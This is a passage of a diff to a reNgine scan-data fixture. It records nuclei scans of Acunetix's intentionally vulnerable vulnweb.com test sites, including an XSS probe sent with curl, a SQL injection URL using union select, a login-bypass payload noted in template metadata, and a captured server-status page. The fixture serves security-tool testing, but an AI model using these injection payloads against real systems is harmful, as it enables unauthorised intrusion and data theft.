href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:18.573246257Z\",\"curl-command\":\"curl -X 'POST' -d '_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/waf-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/waf-detect\",\"template-id\":\"waf-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/waf-detect.yaml\",\"info\":{\"name\":\"WAF Detection\",\"author\":[\"dwisiswant0\",\"lu4nx\"],\"tags\":[\"waf\",\"tech\",\"misc\"],\"description\":\"A web application firewall was detected.\",\"reference\":[\"https://github.com/Ekultek/WhatWaf\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"matcher-name\":\"aspgeneric\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"POST / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\\r\\nConnection: close\\r\\nContent-Length: 27\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e\",\"response\":\"HTTP/1.1 500 Internal Server Error\\r\\nConnection: close\\r\\nContent-Length: 6048\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:44:14 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n \\u003chead\\u003e\\r\\n \\u003ctitle\\u003eA potentially dangerous Request.Form value was detected from the client (_=\\u0026quot;\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/sc...\\u0026quot;).\\u003c/title\\u003e\\r\\n \\u003cstyle\\u003e\\r\\n body {font-family:\\\"Verdana\\\";font-weight:normal;font-size: .7em;color:black;} \\r\\n p {font-family:\\\"Verdana\\\";font-weight:normal;color:black;margin-top: -5px}\\r\\n b {font-family:\\\"Verdana\\\";font-weight:bold;color:black;margin-top: -5px}\\r\\n H1 { font-family:\\\"Verdana\\\";font-weight:normal;font-size:18pt;color:red }\\r\\n H2 { font-family:\\\"Verdana\\\";font-weight:normal;font-size:14pt;color:maroon }\\r\\n pre {font-family:\\\"Lucida Console\\\";font-size: .9em}\\r\\n .marker {font-weight: bold; color: black;text-decoration: none;}\\r\\n .version {color: gray;}\\r\\n .error {margin-bottom: 10px;}\\r\\n .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }\\r\\n \\u003c/style\\u003e\\r\\n \\u003c/head\\u003e\\r\\n\\r\\n \\u003cbody bgcolor=\\\"white\\\"\\u003e\\r\\n\\r\\n \\u003cspan\\u003e\\u003cH1\\u003eServer Error in '/' Application.\\u003chr width=100% size=1 color=silver\\u003e\\u003c/H1\\u003e\\r\\n\\r\\n \\u003ch2\\u003e \\u003ci\\u003eA potentially dangerous Request.Form value was detected from the client (_=\\u0026quot;\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/sc...\\u0026quot;).\\u003c/i\\u003e \\u003c/h2\\u003e\\u003c/span\\u003e\\r\\n\\r\\n \\u003cfont face=\\\"Arial, Helvetica, Geneva, SunSans-Regular, sans-serif \\\"\\u003e\\r\\n\\r\\n \\u003cb\\u003e Description: \\u003c/b\\u003eRequest Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the \\u003cpages\\u003e configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.\\r\\n \\u003cbr\\u003e\\u003cbr\\u003e\\r\\n\\r\\n \\u003cb\\u003e Exception Details: \\u003c/b\\u003eSystem.Web.HttpRequestValidationException: A potentially dangerous Request.Form value was detected from the client (_=\\u0026quot;\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/sc...\\u0026quot;).\\u003cbr\\u003e\\u003cbr\\u003e\\r\\n\\r\\n \\u003cb\\u003eSource Error:\\u003c/b\\u003e \\u003cbr\\u003e\\u003cbr\\u003e\\r\\n\\r\\n \\u003ctable width=100% bgcolor=\\\"#ffffcc\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd\\u003e\\r\\n \\u003ccode\\u003e\\u003cpre\\u003e\\r\\n\\r\\n[No relevant source lines]\\u003c/pre\\u003e\\u003c/code\\u003e\\r\\n\\r\\n \\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e\\r\\n \\u003c/table\\u003e\\r\\n\\r\\n \\u003cbr\\u003e\\r\\n\\r\\n \\u003cb\\u003e Source File: \\u003c/b\\u003e c:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.0.50727\\\\Temporary ASP.NET Files\\\\root\\\\e6eb278b\\\\4a52d72d\\\\App_Web_hnrrotav.2.cs\\u003cb\\u003e \\u0026nbsp;\\u0026nbsp; Line: \\u003c/b\\u003e 0\\r\\n \\u003cbr\\u003e\\u003cbr\\u003e\\r\\n\\r\\n \\u003cb\\u003eStack Trace:\\u003c/b\\u003e \\u003cbr\\u003e\\u003cbr\\u003e\\r\\n\\r\\n \\u003ctable width=100% bgcolor=\\\"#ffffcc\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd\\u003e\\r\\n \\u003ccode\\u003e\\u003cpre\\u003e\\r\\n\\r\\n[HttpRequestValidationException (0x80004005): A potentially dangerous Request.Form value was detected from the client (_=\\u0026quot;\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/sc...\\u0026quot;).]\\r\\n System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +11206219\\r\\n System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +71\\r\\n System.Web.HttpRequest.get_Form() +178\\r\\n System.Web.HttpRequest.get_HasForm() +11206455\\r\\n System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +124\\r\\n System.Web.UI.Page.DeterminePostBackMode() +83\\r\\n System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11171879\\r\\n System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11171418\\r\\n System.Web.UI.Page.ProcessRequest() +91\\r\\n System.Web.UI.Page.ProcessRequest(HttpContext context) +240\\r\\n ASP.default_aspx.ProcessRequest(HttpContext context) in c:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.0.50727\\\\Temporary ASP.NET Files\\\\root\\\\e6eb278b\\\\4a52d72d\\\\App_Web_hnrrotav.2.cs:0\\r\\n System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +599\\r\\n System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean\\u0026amp; completedSynchronously) +171\\r\\n\\u003c/pre\\u003e\\u003c/code\\u003e\\r\\n\\r\\n \\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e\\r\\n \\u003c/table\\u003e\\r\\n\\r\\n \\u003cbr\\u003e\\r\\n\\r\\n \\u003chr width=100% size=1 color=silver\\u003e\\r\\n\\r\\n \\u003cb\\u003eVersion Information:\\u003c/b\\u003e\\u0026nbsp;Microsoft .NET Framework Version:2.0.50727.8813; ASP.NET Version:2.0.50727.8951\\r\\n\\r\\n \\u003c/font\\u003e\\r\\n\\r\\n \\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- \\r\\n[HttpRequestValidationException]: A potentially dangerous Request.Form value was detected from the client (_=\\u0026quot;\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/sc...\\u0026quot;).\\r\\n at System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName)\\r\\n at System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName)\\r\\n at System.Web.HttpRequest.get_Form()\\r\\n at System.Web.HttpRequest.get_HasForm()\\r\\n at System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull)\\r\\n at System.Web.UI.Page.DeterminePostBackMode()\\r\\n at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)\\r\\n at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)\\r\\n at System.Web.UI.Page.ProcessRequest()\\r\\n at System.Web.UI.Page.ProcessRequest(HttpContext context)\\r\\n at ASP.default_aspx.ProcessRequest(HttpContext context) in c:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.0.50727\\\\Temporary ASP.NET Files\\\\root\\\\e6eb278b\\\\4a52d72d\\\\App_Web_hnrrotav.2.cs:line 0\\r\\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\\r\\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean\\u0026 completedSynchronously)\\r\\n--\\u003e\\u003c!-- \\r\\nThis error page might contain sensitive information because ASP.NET is configured to show verbose error messages using \\u0026lt;customErrors mode=\\\"Off\\\"/\\u0026gt;. Consider using \\u0026lt;customErrors mode=\\\"On\\\"/\\u0026gt; or \\u0026lt;customErrors mode=\\\"RemoteOnly\\\"/\\u0026gt; in production environments.--\\u003e\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:18.765370053Z\",\"curl-command\":\"curl -X 'POST' -d '_=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testaspnet.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n", + "time": "2024-11-13T02:34:18.639Z" } }, { - "model": "startScan.dork", - "pk": 3, + "model": "startScan.command", + "pk": 102, "fields": { - "type": "login_pages", - "url": "http://testasp.vulnweb.com/Search.asp" + "scan_history": 1, + "activity": 13, + "command": "nuclei -j -irr -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt -c 50 -retries 1 -rl 150 -timeout 5 -silent -t /home/rengine/nuclei-templates -severity low", + "return_code": 0, + "output": "{\"template\":\"http/misconfiguration/apache/apache-server-status.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/apache-server-status\",\"template-id\":\"apache-server-status\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/apache/apache-server-status.yaml\",\"info\":{\"name\":\"Apache Server Status Disclosure\",\"author\":[\"thabisocn\"],\"tags\":[\"misconfig\",\"exposure\",\"apache\",\"debug\"],\"description\":\"Apache /server-status displays information about your Apache status. If you are not using this feature, disable it.\\n\",\"reference\":[\"https://www.exploit-db.com/ghdb/5548\",\"https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-status-detected/\",\"https://www.acunetix.com/vulnerabilities/web/apache-server-status-detected/\"],\"severity\":\"low\",\"metadata\":{\"verified\":true,\"max-request\":2,\"google-query\":[\"site:*/server-status intext:\\\"Apache server status for\\\"\",\"site:*/server-info intext:\\\"Apache server Information\\\"\"]}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/server-status\",\"request\":\"GET /cgi-bin/server-status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/11605.3.8.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Type: text/html; charset=ISO-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:36:34 GMT\\r\\nServer: nginx/1.19.0\\r\\nVary: Accept-Encoding\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003eApache Status\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eApache Server Status for localhost (via 127.0.0.1)\\u003c/h1\\u003e\\n\\n\\u003cdl\\u003e\\u003cdt\\u003eServer Version: Apache/2.4.46 (Ubuntu)\\u003c/dt\\u003e\\n\\u003cdt\\u003eServer MPM: prefork\\u003c/dt\\u003e\\n\\u003cdt\\u003eServer Built: 2020-08-10T12:32:13\\n\\u003c/dt\\u003e\\u003c/dl\\u003e\\u003chr /\\u003e\\u003cdl\\u003e\\n\\u003cdt\\u003eCurrent Time: Wednesday, 13-Nov-2024 02:36:34 UTC\\u003c/dt\\u003e\\n\\u003cdt\\u003eRestart Time: Wednesday, 13-Nov-2024 02:32:15 UTC\\u003c/dt\\u003e\\n\\u003cdt\\u003eParent Server Config. Generation: 1\\u003c/dt\\u003e\\n\\u003cdt\\u003eParent Server MPM Generation: 0\\u003c/dt\\u003e\\n\\u003cdt\\u003eServer uptime: 4 minutes 18 seconds\\u003c/dt\\u003e\\n\\u003cdt\\u003eServer load: 0.91 0.44 0.22\\u003c/dt\\u003e\\n\\u003cdt\\u003eTotal accesses: 3477 - Total Traffic: 2.7 MB - Total Duration: 836\\u003c/dt\\u003e\\n\\u003cdt\\u003eCPU Usage: u.53 s.26 cu0 cs0 - .306% CPU load\\u003c/dt\\u003e\\n\\u003cdt\\u003e13.5 requests/sec - 10.7 kB/second - 816 B/request - .240437 ms/request\\u003c/dt\\u003e\\n\\u003cdt\\u003e2 requests currently being processed, 3 idle workers\\u003c/dt\\u003e\\n\\u003c/dl\\u003e\\u003cpre\\u003e__W_C...........................................................\\n................................................................\\n......................\\u003c/pre\\u003e\\n\\u003cp\\u003eScoreboard Key:\\u003cbr /\\u003e\\n\\\"\\u003cb\\u003e\\u003ccode\\u003e_\\u003c/code\\u003e\\u003c/b\\u003e\\\" Waiting for Connection, \\n\\\"\\u003cb\\u003e\\u003ccode\\u003eS\\u003c/code\\u003e\\u003c/b\\u003e\\\" Starting up, \\n\\\"\\u003cb\\u003e\\u003ccode\\u003eR\\u003c/code\\u003e\\u003c/b\\u003e\\\" Reading Request,\\u003cbr /\\u003e\\n\\\"\\u003cb\\u003e\\u003ccode\\u003eW\\u003c/code\\u003e\\u003c/b\\u003e\\\" Sending Reply, \\n\\\"\\u003cb\\u003e\\u003ccode\\u003eK\\u003c/code\\u003e\\u003c/b\\u003e\\\" Keepalive (read), \\n\\\"\\u003cb\\u003e\\u003ccode\\u003eD\\u003c/code\\u003e\\u003c/b\\u003e\\\" DNS Lookup,\\u003cbr /\\u003e\\n\\\"\\u003cb\\u003e\\u003ccode\\u003eC\\u003c/code\\u003e\\u003c/b\\u003e\\\" Closing connection, \\n\\\"\\u003cb\\u003e\\u003ccode\\u003eL\\u003c/code\\u003e\\u003c/b\\u003e\\\" Logging, \\n\\\"\\u003cb\\u003e\\u003ccode\\u003eG\\u003c/code\\u003e\\u003c/b\\u003e\\\" Gracefully finishing,\\u003cbr /\\u003e \\n\\\"\\u003cb\\u003e\\u003ccode\\u003eI\\u003c/code\\u003e\\u003c/b\\u003e\\\" Idle cleanup of worker, \\n\\\"\\u003cb\\u003e\\u003ccode\\u003e.\\u003c/code\\u003e\\u003c/b\\u003e\\\" Open slot with no current process\\u003cbr /\\u003e\\n\\u003c/p\\u003e\\n\\n\\n\\u003ctable border=\\\"0\\\"\\u003e\\u003ctr\\u003e\\u003cth\\u003eSrv\\u003c/th\\u003e\\u003cth\\u003ePID\\u003c/th\\u003e\\u003cth\\u003eAcc\\u003c/th\\u003e\\u003cth\\u003eM\\u003c/th\\u003e\\u003cth\\u003eCPU\\n\\u003c/th\\u003e\\u003cth\\u003eSS\\u003c/th\\u003e\\u003cth\\u003eReq\\u003c/th\\u003e\\u003cth\\u003eDur\\u003c/th\\u003e\\u003cth\\u003eConn\\u003c/th\\u003e\\u003cth\\u003eChild\\u003c/th\\u003e\\u003cth\\u003eSlot\\u003c/th\\u003e\\u003cth\\u003eClient\\u003c/th\\u003e\\u003cth\\u003eProtocol\\u003c/th\\u003e\\u003cth\\u003eVHost\\u003c/th\\u003e\\u003cth\\u003eRequest\\u003c/th\\u003e\\u003c/tr\\u003e\\n\\n\\u003ctr\\u003e\\u003ctd\\u003e\\u003cb\\u003e0-0\\u003c/b\\u003e\\u003c/td\\u003e\\u003ctd\\u003e3056288\\u003c/td\\u003e\\u003ctd\\u003e0/695/695\\u003c/td\\u003e\\u003ctd\\u003e_\\n\\u003c/td\\u003e\\u003ctd\\u003e0.15\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e162\\u003c/td\\u003e\\u003ctd\\u003e0.0\\u003c/td\\u003e\\u003ctd\\u003e0.54\\u003c/td\\u003e\\u003ctd\\u003e0.54\\n\\u003c/td\\u003e\\u003ctd\\u003e127.0.0.1\\u003c/td\\u003e\\u003ctd\\u003ehttp/1.1\\u003c/td\\u003e\\u003ctd nowrap\\u003e2600:1f14:a72:b00:183a:bb44:f69\\u003c/td\\u003e\\u003ctd nowrap\\u003eGET //etc.children.json?FNZ.css HTTP/1.0\\u003c/td\\u003e\\u003c/tr\\u003e\\n\\n\\u003ctr\\u003e\\u003ctd\\u003e\\u003cb\\u003e1-0\\u003c/b\\u003e\\u003c/td\\u003e\\u003ctd\\u003e3056289\\u003c/td\\u003e\\u003ctd\\u003e0/696/696\\u003c/td\\u003e\\u003ctd\\u003e_\\n\\u003c/td\\u003e\\u003ctd\\u003e0.15\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e175\\u003c/td\\u003e\\u003ctd\\u003e0.0\\u003c/td\\u003e\\u003ctd\\u003e0.54\\u003c/td\\u003e\\u003ctd\\u003e0.54\\n\\u003c/td\\u003e\\u003ctd\\u003e127.0.0.1\\u003c/td\\u003e\\u003ctd\\u003ehttp/1.1\\u003c/td\\u003e\\u003ctd nowrap\\u003e2600:1f14:a72:b00:183a:bb44:f69\\u003c/td\\u003e\\u003ctd nowrap\\u003eGET //1/etc.children.json/FNZ.png HTTP/1.0\\u003c/td\\u003e\\u003c/tr\\u003e\\n\\n\\u003ctr\\u003e\\u003ctd\\u003e\\u003cb\\u003e2-0\\u003c/b\\u003e\\u003c/td\\u003e\\u003ctd\\u003e3056290\\u003c/td\\u003e\\u003ctd\\u003e0/698/698\\u003c/td\\u003e\\u003ctd\\u003e\\u003cb\\u003eW\\u003c/b\\u003e\\n\\u003c/td\\u003e\\u003ctd\\u003e0.16\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e181\\u003c/td\\u003e\\u003ctd\\u003e0.0\\u003c/td\\u003e\\u003ctd\\u003e0.54\\u003c/td\\u003e\\u003ctd\\u003e0.54\\n\\u003c/td\\u003e\\u003ctd\\u003e127.0.0.1\\u003c/td\\u003e\\u003ctd\\u003ehttp/1.1\\u003c/td\\u003e\\u003ctd nowrap\\u003e2600:1f14:a72:b00:183a:bb44:f69\\u003c/td\\u003e\\u003ctd nowrap\\u003eGET //server-status HTTP/1.0\\u003c/td\\u003e\\u003c/tr\\u003e\\n\\n\\u003ctr\\u003e\\u003ctd\\u003e\\u003cb\\u003e3-0\\u003c/b\\u003e\\u003c/td\\u003e\\u003ctd\\u003e3056291\\u003c/td\\u003e\\u003ctd\\u003e0/692/692\\u003c/td\\u003e\\u003ctd\\u003e_\\n\\u003c/td\\u003e\\u003ctd\\u003e0.15\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e157\\u003c/td\\u003e\\u003ctd\\u003e0.0\\u003c/td\\u003e\\u003ctd\\u003e0.54\\u003c/td\\u003e\\u003ctd\\u003e0.54\\n\\u003c/td\\u003e\\u003ctd\\u003e127.0.0.1\\u003c/td\\u003e\\u003ctd\\u003ehttp/1.1\\u003c/td\\u003e\\u003ctd nowrap\\u003e2600:1f14:a72:b00:183a:bb44:f69\\u003c/td\\u003e\\u003ctd nowrap\\u003eGET //1/etc.children.json?FNZ.css HTTP/1.0\\u003c/td\\u003e\\u003c/tr\\u003e\\n\\n\\u003ctr\\u003e\\u003ctd\\u003e\\u003cb\\u003e4-0\\u003c/b\\u003e\\u003c/td\\u003e\\u003ctd\\u003e3056292\\u003c/td\\u003e\\u003ctd\\u003e0/696/696\\u003c/td\\u003e\\u003ctd\\u003e_\\n\\u003c/td\\u003e\\u003ctd\\u003e0.15\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e160\\u003c/td\\u003e\\u003ctd\\u003e0.0\\u003c/td\\u003e\\u003ctd\\u003e0.54\\u003c/td\\u003e\\u003ctd\\u003e0.54\\n\\u003c/td\\u003e\\u003ctd\\u003e127.0.0.1\\u003c/td\\u003e\\u003ctd\\u003ehttp/1.1\\u003c/td\\u003e\\u003ctd nowrap\\u003e2600:1f14:a72:b00:183a:bb44:f69\\u003c/td\\u003e\\u003ctd nowrap\\u003eGET //etc.children....4.2.1....json HTTP/1.0\\u003c/td\\u003e\\u003c/tr\\u003e\\n\\n\\u003c/table\\u003e\\n \\u003chr /\\u003e \\u003ctable\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eSrv\\u003c/th\\u003e\\u003ctd\\u003eChild Server number - generation\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003ePID\\u003c/th\\u003e\\u003ctd\\u003eOS process ID\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eAcc\\u003c/th\\u003e\\u003ctd\\u003eNumber of accesses this connection / this child / this slot\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eM\\u003c/th\\u003e\\u003ctd\\u003eMode of operation\\u003c/td\\u003e\\u003c/tr\\u003e\\n\\u003ctr\\u003e\\u003cth\\u003eCPU\\u003c/th\\u003e\\u003ctd\\u003eCPU usage, number of seconds\\u003c/td\\u003e\\u003c/tr\\u003e\\n\\u003ctr\\u003e\\u003cth\\u003eSS\\u003c/th\\u003e\\u003ctd\\u003eSeconds since beginning of most recent request\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eReq\\u003c/th\\u003e\\u003ctd\\u003eMilliseconds required to process most recent request\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eDur\\u003c/th\\u003e\\u003ctd\\u003eSum of milliseconds required to process all requests\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eConn\\u003c/th\\u003e\\u003ctd\\u003eKilobytes transferred this connection\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eChild\\u003c/th\\u003e\\u003ctd\\u003eMegabytes transferred this child\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003ctr\\u003e\\u003cth\\u003eSlot\\u003c/th\\u003e\\u003ctd\\u003eTotal megabytes transferred this slot\\u003c/td\\u003e\\u003c/tr\\u003e\\n \\u003c/table\\u003e\\n\\u003chr /\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:36:34.401554939Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/11605.3.8.1' 'http://testphp.vulnweb.com/cgi-bin/server-status'\",\"matcher-status\":true}\n", + "time": "2024-11-13T02:34:18.819Z" } }, { - "model": "startScan.dork", - "pk": 4, + "model": "startScan.command", + "pk": 103, "fields": { - "type": "login_pages", - "url": "http://testaspnet.vulnweb.com/login.aspx" + "scan_history": 1, + "activity": 14, + "command": "nuclei -j -irr -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt -c 50 -retries 1 -rl 150 -timeout 5 -silent -t /home/rengine/nuclei-templates -severity high", + "return_code": 0, + "output": "{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true,\"max-request\":2},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET 